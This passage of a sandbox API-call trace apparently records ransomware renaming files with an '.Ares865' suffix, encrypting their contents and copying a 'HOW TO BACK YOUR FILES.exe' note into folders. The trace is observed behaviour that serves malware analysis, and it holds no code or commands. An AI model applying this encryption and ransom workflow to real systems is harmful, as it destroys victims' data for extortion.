returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0065.462] lstrlenW (lpString="ckp") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0065.462] lstrlenW (lpString="cma") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0065.462] lstrlenW (lpString="cpd") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0065.463] lstrlenW (lpString="dacpac") returned 6 [0065.463] lstrcmpiW (lpString1="eed-ms", lpString2="dacpac") returned 1 [0065.463] lstrlenW (lpString="dad") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0065.463] lstrlenW (lpString="dadiagrams") returned 10 [0065.463] lstrcmpiW (lpString1="y~.feed-ms", lpString2="dadiagrams") returned 1 [0065.463] lstrlenW (lpString="daschema") returned 8 [0065.463] lstrcmpiW (lpString1=".feed-ms", lpString2="daschema") returned -1 [0065.463] lstrlenW (lpString="db-journal") returned 10 [0065.463] lstrcmpiW (lpString1="y~.feed-ms", lpString2="db-journal") returned 1 [0065.463] lstrlenW (lpString="db-shm") returned 6 [0065.463] lstrcmpiW (lpString1="eed-ms", lpString2="db-shm") returned 1 [0065.463] lstrlenW (lpString="db-wal") returned 6 [0065.463] lstrcmpiW (lpString1="eed-ms", lpString2="db-wal") returned 1 [0065.463] lstrlenW (lpString="dbc") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0065.463] lstrlenW (lpString="dbs") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0065.463] lstrlenW (lpString="dbt") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0065.463] lstrlenW (lpString="dbv") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0065.463] lstrlenW (lpString="dbx") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0065.463] lstrlenW (lpString="dcb") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0065.463] lstrlenW (lpString="dct") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0065.463] lstrlenW (lpString="dcx") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0065.463] lstrlenW (lpString="ddl") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0065.463] lstrlenW (lpString="dlis") returned 4 [0065.463] lstrcmpiW (lpString1="d-ms", lpString2="dlis") returned 1 [0065.463] lstrlenW (lpString="dp1") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0065.463] lstrlenW (lpString="dqy") returned 3 [0065.463] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0065.464] lstrlenW (lpString="dsk") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0065.464] lstrlenW (lpString="dsn") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0065.464] lstrlenW (lpString="dtsx") returned 4 [0065.464] lstrcmpiW (lpString1="d-ms", lpString2="dtsx") returned -1 [0065.464] lstrlenW (lpString="dxl") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0065.464] lstrlenW (lpString="eco") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0065.464] lstrlenW (lpString="ecx") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0065.464] lstrlenW (lpString="edb") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0065.464] lstrlenW (lpString="epim") returned 4 [0065.464] lstrcmpiW (lpString1="d-ms", lpString2="epim") returned -1 [0065.464] lstrlenW (lpString="fcd") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0065.464] lstrlenW (lpString="fdb") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0065.464] lstrlenW (lpString="fic") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0065.464] lstrlenW (lpString="flexolibrary") returned 12 [0065.464] lstrcmpiW (lpString1="ery~.feed-ms", lpString2="flexolibrary") returned -1 [0065.464] lstrlenW (lpString="fm5") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0065.464] lstrlenW (lpString="fmp") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0065.464] lstrlenW (lpString="fmp12") returned 5 [0065.464] lstrcmpiW (lpString1="ed-ms", lpString2="fmp12") returned -1 [0065.464] lstrlenW (lpString="fmpsl") returned 5 [0065.464] lstrcmpiW (lpString1="ed-ms", lpString2="fmpsl") returned -1 [0065.464] lstrlenW (lpString="fol") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0065.464] lstrlenW (lpString="fp3") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0065.464] lstrlenW (lpString="fp4") returned 3 [0065.464] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0065.465] lstrlenW (lpString="fp5") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0065.465] lstrlenW (lpString="fp7") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0065.465] lstrlenW (lpString="fpt") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0065.465] lstrlenW (lpString="frm") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0065.465] lstrlenW (lpString="gdb") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.465] lstrlenW (lpString="gdb") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.465] lstrlenW (lpString="grdb") returned 4 [0065.465] lstrcmpiW (lpString1="d-ms", lpString2="grdb") returned -1 [0065.465] lstrlenW (lpString="gwi") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0065.465] lstrlenW (lpString="hdb") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0065.465] lstrlenW (lpString="his") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0065.465] lstrlenW (lpString="ib") returned 2 [0065.465] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0065.465] lstrlenW (lpString="idb") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0065.465] lstrlenW (lpString="ihx") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0065.465] lstrlenW (lpString="itdb") returned 4 [0065.465] lstrcmpiW (lpString1="d-ms", lpString2="itdb") returned -1 [0065.465] lstrlenW (lpString="itw") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0065.465] lstrlenW (lpString="jet") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0065.465] lstrlenW (lpString="jtx") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0065.465] lstrlenW (lpString="kdb") returned 3 [0065.465] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0065.465] lstrlenW (lpString="kexi") returned 4 [0065.465] lstrcmpiW (lpString1="d-ms", lpString2="kexi") returned -1 [0065.466] lstrlenW (lpString="kexic") returned 5 [0065.466] lstrcmpiW (lpString1="ed-ms", lpString2="kexic") returned -1 [0065.466] lstrlenW (lpString="kexis") returned 5 [0065.466] lstrcmpiW (lpString1="ed-ms", lpString2="kexis") returned -1 [0065.466] lstrlenW (lpString="lgc") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0065.466] lstrlenW (lpString="lwx") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0065.466] lstrlenW (lpString="maf") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0065.466] lstrlenW (lpString="maq") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0065.466] lstrlenW (lpString="mar") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0065.466] lstrlenW (lpString="marshal") returned 7 [0065.466] lstrcmpiW (lpString1="feed-ms", lpString2="marshal") returned -1 [0065.466] lstrlenW (lpString="mas") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0065.466] lstrlenW (lpString="mav") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0065.466] lstrlenW (lpString="maw") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0065.466] lstrlenW (lpString="mdbhtml") returned 7 [0065.466] lstrcmpiW (lpString1="feed-ms", lpString2="mdbhtml") returned -1 [0065.466] lstrlenW (lpString="mdn") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0065.466] lstrlenW (lpString="mdt") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0065.466] lstrlenW (lpString="mfd") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0065.466] lstrlenW (lpString="mpd") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0065.466] lstrlenW (lpString="mrg") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0065.466] lstrlenW (lpString="mud") returned 3 [0065.466] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0065.466] lstrlenW (lpString="mwb") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0065.467] lstrlenW (lpString="myd") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0065.467] lstrlenW (lpString="ndf") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0065.467] lstrlenW (lpString="nnt") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0065.467] lstrlenW (lpString="nrmlib") returned 6 [0065.467] lstrcmpiW (lpString1="eed-ms", lpString2="nrmlib") returned -1 [0065.467] lstrlenW (lpString="ns2") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0065.467] lstrlenW (lpString="ns3") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0065.467] lstrlenW (lpString="ns4") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0065.467] lstrlenW (lpString="nsf") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0065.467] lstrlenW (lpString="nv") returned 2 [0065.467] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0065.467] lstrlenW (lpString="nv2") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0065.467] lstrlenW (lpString="nwdb") returned 4 [0065.467] lstrcmpiW (lpString1="d-ms", lpString2="nwdb") returned -1 [0065.467] lstrlenW (lpString="nyf") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0065.467] lstrlenW (lpString="odb") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.467] lstrlenW (lpString="odb") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.467] lstrlenW (lpString="oqy") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0065.467] lstrlenW (lpString="ora") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0065.467] lstrlenW (lpString="orx") returned 3 [0065.467] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0065.467] lstrlenW (lpString="owc") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0065.468] lstrlenW (lpString="p96") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0065.468] lstrlenW (lpString="p97") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0065.468] lstrlenW (lpString="pan") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0065.468] lstrlenW (lpString="pdb") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0065.468] lstrlenW (lpString="pdm") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0065.468] lstrlenW (lpString="pnz") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0065.468] lstrlenW (lpString="qry") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0065.468] lstrlenW (lpString="qvd") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0065.468] lstrlenW (lpString="rbf") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0065.468] lstrlenW (lpString="rctd") returned 4 [0065.468] lstrcmpiW (lpString1="d-ms", lpString2="rctd") returned -1 [0065.468] lstrlenW (lpString="rod") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0065.468] lstrlenW (lpString="rodx") returned 4 [0065.468] lstrcmpiW (lpString1="d-ms", lpString2="rodx") returned -1 [0065.468] lstrlenW (lpString="rpd") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0065.468] lstrlenW (lpString="rsd") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0065.468] lstrlenW (lpString="sas7bdat") returned 8 [0065.468] lstrcmpiW (lpString1=".feed-ms", lpString2="sas7bdat") returned -1 [0065.468] lstrlenW (lpString="sbf") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0065.468] lstrlenW (lpString="scx") returned 3 [0065.468] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0065.468] lstrlenW (lpString="sdb") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0065.469] lstrlenW (lpString="sdc") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0065.469] lstrlenW (lpString="sdf") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0065.469] lstrlenW (lpString="sis") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0065.469] lstrlenW (lpString="spq") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0065.469] lstrlenW (lpString="te") returned 2 [0065.469] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0065.469] lstrlenW (lpString="teacher") returned 7 [0065.469] lstrcmpiW (lpString1="feed-ms", lpString2="teacher") returned -1 [0065.469] lstrlenW (lpString="tmd") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0065.469] lstrlenW (lpString="tps") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0065.469] lstrlenW (lpString="trc") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.469] lstrlenW (lpString="trc") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.469] lstrlenW (lpString="trm") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0065.469] lstrlenW (lpString="udb") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0065.469] lstrlenW (lpString="udl") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0065.469] lstrlenW (lpString="usr") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0065.469] lstrlenW (lpString="v12") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0065.469] lstrlenW (lpString="vis") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0065.469] lstrlenW (lpString="vpd") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0065.469] lstrlenW (lpString="vvv") returned 3 [0065.469] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0065.469] lstrlenW (lpString="wdb") returned 3 [0065.470] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0065.470] lstrlenW (lpString="wmdb") returned 4 [0065.470] lstrcmpiW (lpString1="d-ms", lpString2="wmdb") returned -1 [0065.470] lstrlenW (lpString="wrk") returned 3 [0065.470] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0065.470] lstrlenW (lpString="xdb") returned 3 [0065.470] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0065.470] lstrlenW (lpString="xld") returned 3 [0065.470] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0065.470] lstrlenW (lpString="xmlff") returned 5 [0065.470] lstrcmpiW (lpString1="ed-ms", lpString2="xmlff") returned -1 [0065.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865") returned 138 [0065.470] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0065.471] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.471] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0065.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.471] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.472] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7300, lpName=0x0) returned 0x118 [0065.474] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7300) returned 0x190000 [0065.475] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.477] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.477] CloseHandle (hObject=0x118) returned 1 [0065.477] CloseHandle (hObject=0x164) returned 1 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.478] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 0 [0065.478] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.478] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0065.478] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f28 | out: hHeap=0x2b0000) returned 1 [0065.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.478] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned 69 [0065.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0065.478] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.478] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.478] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.479] GetLastError () returned 0x0 [0065.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.479] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.479] CloseHandle (hObject=0x12c) returned 1 [0065.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.479] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.479] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.479] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.479] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.479] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.479] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.479] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.479] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.479] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.479] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.479] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, 